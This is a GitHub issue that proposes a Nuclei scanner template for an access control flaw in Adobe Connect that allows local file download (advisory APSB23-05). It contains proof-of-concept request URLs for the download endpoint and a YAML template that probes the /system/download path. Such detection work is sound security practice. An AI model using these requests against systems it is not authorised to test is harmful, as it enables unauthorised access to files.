### ISSUE TITLE
lfd-adobe-connect.yaml

### ISSUE THREAD

**Issue by Kro0oz** [projectdiscovery/nuclei-templates#8748]
### Template Information:
Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction

### POC :
https://target.com/[folder]/download?download-url=[URL]&name=[file.type]
https://target.com/[folder]/download?output=output&download_type=[Suffix]&ffn=[URL]&baseContentUrl=[base-file-folder]

References
https://vulners.com/zdt/1337DAY-ID-38552
https://helpx.adobe.com/security/products/connect/apsb23-05.html

### Nuclei Template:

```yaml
id: lfd-adobe-connect
info:
  name: Adobe Connect LFD Vulnerability
  author: 1337kro
  severity: high
  description: Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction
  reference:
    - https://helpx.adobe.com/security/products/connect/apsb23-05.html
  tags: lfd,adobe

http:
  - method: GET
    path:
      - "{{BaseURL}}/system/download?download-url=/_a7/p49dm7f4qjyt/output/&name=exam.pdf"
    matchers:
      - type: word
        words:
          - "Save to My Computer"
          - "exam.pdf"
        condition: and
```
